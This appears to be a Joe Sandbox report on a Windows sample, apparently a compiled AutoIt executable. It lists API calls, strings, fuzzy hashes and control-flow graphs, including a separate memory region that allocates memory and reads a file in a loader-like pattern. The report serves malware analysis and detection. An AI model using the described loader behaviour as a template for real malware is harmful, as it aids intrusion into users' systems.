                                                            • Instruction ID: d546148ae0cfb9cc6b3d338c03509cfb89b0acf651641ddf42f74ea83fdff5ca
                                                            • Opcode Fuzzy Hash: afb8bd5dc4ed1d53f18a81a63ba3443d7a58be894f8779ab1d268d7b5ffdd954
                                                            • Instruction Fuzzy Hash: F051C530D0524CAACF11ABF8DC05EED7B7DFF04704B0442AAF565E22A2EB744695DB62

                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 00814B2B
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            • GetCurrentProcess.KERNEL32(?,0089FAEC,00000000,00000000,?), ref: 00814BF8
                                                            • IsWow64Process.KERNEL32(00000000), ref: 00814BFF
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00814C45
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00814C50
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00814C81
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00814C8D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: 6645bd3f58fe9296657f7050aa7be65837151ae6e0a7f01d043ab88fb1bbb2bf
                                                            • Instruction ID: 44648a43a486cd071ae076f11cd6697a18ff2eb36cbee6bafb8251c8716281f6
                                                            • Opcode Fuzzy Hash: 6645bd3f58fe9296657f7050aa7be65837151ae6e0a7f01d043ab88fb1bbb2bf
                                                            • Instruction Fuzzy Hash: 8691C33154A7C8DEC731DB6894911EABFE8FF26314B58499ED0CAC3B42D234E988C759

                                                            APIs
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00814EEE,?,?,00000000,00000000), ref: 00814FF9
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00814EEE,?,?,00000000,00000000), ref: 00815010
                                                            • LoadResource.KERNEL32(?,00000000,?,?,00814EEE,?,?,00000000,00000000,?,?,?,?,?,?,00814F8F), ref: 0084DD60
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00814EEE,?,?,00000000,00000000,?,?,?,?,?,?,00814F8F), ref: 0084DD75
                                                            • LockResource.KERNEL32(00814EEE,?,?,00814EEE,?,?,00000000,00000000,?,?,?,?,?,?,00814F8F,00000000), ref: 0084DD88
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: 0a35c374056f700372f399fbc73a2c256a374d5e5e62a9fcdd82278561db15d1
                                                            • Instruction ID: 7b62d2cfdfac76aeea01264a2505edd884274ba18b64d61ed99f201b98103dac
                                                            • Opcode Fuzzy Hash: 0a35c374056f700372f399fbc73a2c256a374d5e5e62a9fcdd82278561db15d1
                                                            • Instruction Fuzzy Hash: 46119A74200B00AFD7249BA5DC58F677BBEFFC9B11F244169F50AC6260DB61E8408660
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,0084E7C1), ref: 008746A6
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 008746B7
                                                            • FindClose.KERNEL32(00000000), ref: 008746C7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: 3a5a12e43bd5058bd59bd26926d19eff532355b3fb8bda09dd6e64fee4338321
                                                            • Instruction ID: edc49ea5b5c5016069e827513f23d1aa27b15e8bf26d5584055dd2aa1365e1f2
                                                            • Opcode Fuzzy Hash: 3a5a12e43bd5058bd59bd26926d19eff532355b3fb8bda09dd6e64fee4338321
                                                            • Instruction Fuzzy Hash: 6EE020314184005B56147778EC4D4EA775CFE16335F144717F93AC11E0E7B0DD5089D5
                                                            Strings
                                                            • Variable must be of type 'Object'., xrefs: 0085428C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 0-109567571
                                                            • Opcode ID: ba796cf95708fc13c6c30f5f92ff80333f91c6e5b8a421bd0c0dc7a4eadb11e4
                                                            • Instruction ID: 3a350835148215d3433817eb222bd5c3c3b0df559eb5627bd99ce28bf3bd71df
                                                            • Opcode Fuzzy Hash: ba796cf95708fc13c6c30f5f92ff80333f91c6e5b8a421bd0c0dc7a4eadb11e4
                                                            • Instruction Fuzzy Hash: 64A27B74A04219CBCB24CF58C480AE9B7BAFF58314F648169ED16EB351D735ED86CB81
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00820BBB
                                                            • timeGetTime.WINMM ref: 00820E76
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00820FB3
                                                            • TranslateMessage.USER32(?), ref: 00820FC7
                                                            • DispatchMessageW.USER32(?), ref: 00820FD5
                                                            • Sleep.KERNEL32(0000000A), ref: 00820FDF
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 0082105A
                                                            • DestroyWindow.USER32 ref: 00821066
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00821080
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 008552AD
                                                            • TranslateMessage.USER32(?), ref: 0085608A
                                                            • DispatchMessageW.USER32(?), ref: 00856098
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008560AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                            • API String ID: 4003667617-3242690629
                                                            • Opcode ID: f4da757b65b32683e36f4b9eba40e05be2cd431857c1ee457302d0fc1fd30397
                                                            • Instruction ID: e75bcd8e5b6b8a147c1ff4485c277cf98f54ec5f7b8e1763d6bb3b4fccb4eef2
                                                            • Opcode Fuzzy Hash: f4da757b65b32683e36f4b9eba40e05be2cd431857c1ee457302d0fc1fd30397
                                                            • Instruction Fuzzy Hash: 72B2A070608751DFD728DF24D894BAAB7E5FF84304F14491DE98AD7292DB71E888CB82
                                                            APIs
                                                              • Part of subcall function 008791E9: __time64.LIBCMT ref: 008791F3
                                                              • Part of subcall function 00815045: _fseek.LIBCMT ref: 0081505D
                                                            • __wsplitpath.LIBCMT ref: 008794BE
                                                              • Part of subcall function 0083432E: __wsplitpath_helper.LIBCMT ref: 0083436E
                                                            • _wcscpy.LIBCMT ref: 008794D1
                                                            • _wcscat.LIBCMT ref: 008794E4
                                                            • __wsplitpath.LIBCMT ref: 00879509
                                                            • _wcscat.LIBCMT ref: 0087951F
                                                            • _wcscat.LIBCMT ref: 00879532
                                                              • Part of subcall function 0087922F: _memmove.LIBCMT ref: 00879268
                                                              • Part of subcall function 0087922F: _memmove.LIBCMT ref: 00879277
                                                            • _wcscmp.LIBCMT ref: 00879479
                                                              • Part of subcall function 008799BE: _wcscmp.LIBCMT ref: 00879AAE
                                                              • Part of subcall function 008799BE: _wcscmp.LIBCMT ref: 00879AC1
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008796DC
                                                            • _wcsncpy.LIBCMT ref: 0087974F
                                                            • DeleteFileW.KERNEL32(?,?), ref: 00879785
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0087979B
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008797AC
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008797BE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: 430fc9561268bf16a35caf5b8adce39534dae84611b0035af206a525d7947b46
                                                            • Instruction ID: df84fc8a3d5629c5920044bec4c731676ebb3987d1367b9286afc48ffa934f06
                                                            • Opcode Fuzzy Hash: 430fc9561268bf16a35caf5b8adce39534dae84611b0035af206a525d7947b46
                                                            • Instruction Fuzzy Hash: 18C13DB1900229AACF25DF98CC85EDEB7BDFF95314F0040AAF609E7155DB309A848F65
                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00813074
                                                            • RegisterClassExW.USER32(00000030), ref: 0081309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008130AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 008130CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008130DC
                                                            • LoadIconW.USER32(000000A9), ref: 008130F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00813101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 6ad348dbf4db6232db963b1354cfcd95ed58c5d525db39746be1863af901dfc2
                                                            • Instruction ID: f3f383c7882bbf937dbfdf6112a0c31a2542ee8fa4918a7e5974657ee055ae33
                                                            • Opcode Fuzzy Hash: 6ad348dbf4db6232db963b1354cfcd95ed58c5d525db39746be1863af901dfc2
                                                            • Instruction Fuzzy Hash: 703138B1941349AFDB00DFA4D889AD9BBF4FB09310F18416AE690E62A1E3B60555CF91

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00813074
                                                            • RegisterClassExW.USER32(00000030), ref: 0081309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008130AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 008130CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008130DC
                                                            • LoadIconW.USER32(000000A9), ref: 008130F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00813101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: e7331790e6edec2677961772654a47e6df465d071f23a6957f707e51400bcbf8
                                                            • Instruction ID: 695282b6e0b94424f3182ed38421c63a7b09701a8ab3c611131d7a761532c851
                                                            • Opcode Fuzzy Hash: e7331790e6edec2677961772654a47e6df465d071f23a6957f707e51400bcbf8
                                                            • Instruction Fuzzy Hash: 9021B4B1901258AFDB00EFE4E849ADDBBF8FB08710F14422BF610E62A1E7B545549F91

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00814864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008D62F8,?,008137C0,?), ref: 00814882
                                                              • Part of subcall function 0083074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008172C5), ref: 00830771
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00817308
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0084ECF1
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0084ED32
                                                            • RegCloseKey.ADVAPI32(?), ref: 0084ED70
                                                            • _wcscat.LIBCMT ref: 0084EDC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 2673923337-2727554177
                                                            • Opcode ID: df1578223181c3da5bdf3ebe8989e31eb5f81145ad362c371add80d4eb60c413
                                                            • Instruction ID: 22ef1b37382278593beb54c32a508af185812dd691d994895f6b2e93c100f821
                                                            • Opcode Fuzzy Hash: df1578223181c3da5bdf3ebe8989e31eb5f81145ad362c371add80d4eb60c413
                                                            • Instruction Fuzzy Hash: E2717D715093459EC714EF69EC8199BBBF8FF94710F44062EF556C32A1EB309988CBA2

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00813A62
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00813A71
                                                            • LoadIconW.USER32(00000063), ref: 00813A88
                                                            • LoadIconW.USER32(000000A4), ref: 00813A9A
                                                            • LoadIconW.USER32(000000A2), ref: 00813AAC
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00813AD2
                                                            • RegisterClassExW.USER32(?), ref: 00813B28
                                                              • Part of subcall function 00813041: GetSysColorBrush.USER32(0000000F), ref: 00813074
                                                              • Part of subcall function 00813041: RegisterClassExW.USER32(00000030), ref: 0081309E
                                                              • Part of subcall function 00813041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008130AF
                                                              • Part of subcall function 00813041: InitCommonControlsEx.COMCTL32(?), ref: 008130CC
                                                              • Part of subcall function 00813041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008130DC
                                                              • Part of subcall function 00813041: LoadIconW.USER32(000000A9), ref: 008130F2
                                                              • Part of subcall function 00813041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00813101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 9353742b590e40aa1fb9afb01999fd9aa0b8e565d3dfa2866d742990c3283c01
                                                            • Instruction ID: f9e97f9ed5c59b38e4a76df8732ba4b4898a2b8db3c48e94c8d05d881071b5c5
                                                            • Opcode Fuzzy Hash: 9353742b590e40aa1fb9afb01999fd9aa0b8e565d3dfa2866d742990c3283c01
                                                            • Instruction Fuzzy Hash: 12212D71902308AFDB14AFA4EC09B9D7FF5FB08711F10422BF604A62A1E3B655649F54

                                                            Control-flow Graph

                                                            control_flow_graph 767 813633-813681 769 8136e1-8136e3 767->769 770 813683-813686 767->770 769->770 771 8136e5 769->771 772 8136e7 770->772 773 813688-81368f 770->773 774 8136ca-8136d2 DefWindowProcW 771->774 775 84d31c-84d34a call 8211d0 call 8211f3 772->775 776 8136ed-8136f0 772->776 777 813695-81369a 773->777 778 81375d-813765 PostQuitMessage 773->778 780 8136d8-8136de 774->780 811 84d34f-84d356 775->811 782 8136f2-8136f3 776->782 783 813715-81373c SetTimer RegisterWindowMessageW 776->783 784 8136a0-8136a2 777->784 785 84d38f-84d3a3 call 872a16 777->785 781 813711-813713 778->781 781->780 791 8136f9-81370c KillTimer call 8144cb call 813114 782->791 792 84d2bf-84d2c2 782->792 783->781 786 81373e-813749 CreatePopupMenu 783->786 787 813767-813776 call 814531 784->787 788 8136a8-8136ad 784->788 785->781 803 84d3a9 785->803 786->781 787->781 793 84d374-84d37b 788->793 794 8136b3-8136b8 788->794 791->781 798 84d2c4-84d2c6 792->798 799 84d2f8-84d317 MoveWindow 792->799 793->774 809 84d381-84d38a call 86817e 793->809 801 81374b-81375b call 8145df 794->801 802 8136be-8136c4 794->802 806 84d2e7-84d2f3 SetFocus 798->806 807 84d2c8-84d2cb 798->807 799->781 801->781 802->774 802->811 803->774 806->781 807->802 812 84d2d1-84d2e2 call 8211d0 807->812 809->774 811->774 816 84d35c-84d36f call 8144cb call 8143db 811->816 812->781 816->774
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 008136D2
                                                            • KillTimer.USER32(?,00000001), ref: 008136FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0081371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0081372A
                                                            • CreatePopupMenu.USER32 ref: 0081373E
                                                            • PostQuitMessage.USER32(00000000), ref: 0081375F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: 304f82a023df226fedb704a54516292997dd45e30192626362dbacb9de37b409
                                                            • Instruction ID: 29c83c8930692175341e8d83885925c7b7723ef3eb9303538f3fe3deea3c995f
                                                            • Opcode Fuzzy Hash: 304f82a023df226fedb704a54516292997dd45e30192626362dbacb9de37b409
                                                            • Instruction Fuzzy Hash: C941CAB120514DB7DB156F68EC49BF9375DFF10300F14063BF602D62E1EB649DA4A662

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                            • API String ID: 1825951767-3513169116
                                                            • Opcode ID: 8642e73bb8f5a81cf65c14bd67b888b31c1fae9bcb33b09cf0811a545f20a347
                                                            • Instruction ID: 331b8a7eb55b7ee83e0c4b5b4ae8bb95dd2127e66f2428ddf589ae2b25c11adf
                                                            • Opcode Fuzzy Hash: 8642e73bb8f5a81cf65c14bd67b888b31c1fae9bcb33b09cf0811a545f20a347
                                                            • Instruction Fuzzy Hash: E3A11B7191022D9ACF04EBA8DC95EEEB77DFF14300F14052AE416E7191EF749A89CB61

                                                            Control-flow Graph

                                                            control_flow_graph 942 24425b0-244265e call 2440000 945 2442665-244268b call 24434c0 CreateFileW 942->945 948 2442692-24426a2 945->948 949 244268d 945->949 957 24426a4 948->957 958 24426a9-24426c3 VirtualAlloc 948->958 950 24427dd-24427e1 949->950 951 2442823-2442826 950->951 952 24427e3-24427e7 950->952 954 2442829-2442830 951->954 955 24427f3-24427f7 952->955 956 24427e9-24427ec 952->956 959 2442885-244289a 954->959 960 2442832-244283d 954->960 961 2442807-244280b 955->961 962 24427f9-2442803 955->962 956->955 957->950 963 24426c5 958->963 964 24426ca-24426e1 ReadFile 958->964 967 244289c-24428a7 VirtualFree 959->967 968 24428aa-24428b2 959->968 965 2442841-244284d 960->965 966 244283f 960->966 969 244280d-2442817 961->969 970 244281b 961->970 962->961 963->950 971 24426e3 964->971 972 24426e8-2442728 VirtualAlloc 964->972 975 2442861-244286d 965->975 976 244284f-244285f 965->976 966->959 967->968 969->970 970->951 971->950 973 244272f-244274a call 2443710 972->973 974 244272a 972->974 982 2442755-244275f 973->982 974->950 979 244286f-2442878 975->979 980 244287a-2442880 975->980 978 2442883 976->978 978->954 979->978 980->978 983 2442761-2442790 call 2443710 982->983 984 2442792-24427a6 call 2443520 982->984 983->982 990 24427a8 984->990 991 24427aa-24427ae 984->991 990->950 992 24427b0-24427b4 FindCloseChangeNotification 991->992 993 24427ba-24427be 991->993 992->993 994 24427c0-24427cb VirtualFree 993->994 995 24427ce-24427d7 993->995 994->995 995->945 995->950
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 02442681
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 024428A7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                            • Instruction ID: 28440b081392a02df9c91e90b6c1c198224cc2f039fe9d0c69e5a318f7748b09
                                                            • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
